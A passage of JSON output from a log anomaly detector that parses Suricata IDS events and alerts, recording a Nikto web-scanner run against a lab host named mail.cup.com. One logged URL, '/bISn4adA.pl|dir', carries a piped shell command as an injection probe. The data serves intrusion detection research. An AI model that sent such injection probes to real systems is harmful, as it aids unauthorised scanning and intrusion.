"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46826, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":750897706188682,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 750897706188682, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.213956+0000\",\"flow_id\":750897706188682,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46826,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pl|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pl|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.215650 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46828 -> 192.168.10.154:80", "/parser/model/time": 1583349514.21565, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46828, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.215650 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46828 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.xbb", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.215801+0000\",\"flow_id\":724402052941536,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xbb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xbb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.215801, "/parser/model/plus_sign": "+", 
"/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":724402052941536,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xbb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xbb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xbb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xbb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.xbb\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.xbb\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.xbb", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.xbb", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 
226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46828, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":724402052941536,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 724402052941536, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.215801+0000\",\"flow_id\":724402052941536,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46828,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.xbb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.xbb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.217240 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46830 -> 192.168.10.154:80", "/parser/model/time": 1583349514.21724, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46830, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.217240 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46830 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.LOG", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.217384+0000\",\"flow_id\":2009838519995892,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.LOG\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.LOG\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.217384, "/parser/model/plus_sign": "+", 
"/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2009838519995892,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.LOG\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.LOG\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.LOG\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.LOG\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.LOG\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.LOG\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.LOG", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.LOG", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 
226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46830, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2009838519995892,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2009838519995892, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.217384+0000\",\"flow_id\":2009838519995892,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.LOG\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.LOG\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.218957 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46832 -> 192.168.10.154:80", "/parser/model/time": 1583349514.218957, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46832, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.218957 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46832 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.box", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.219129+0000\",\"flow_id\":1576347470812328,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.box\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.box\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.219129, "/parser/model/plus_sign": "+", 
"/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1576347470812328,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.box\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.box\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.box\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.box\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.box\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
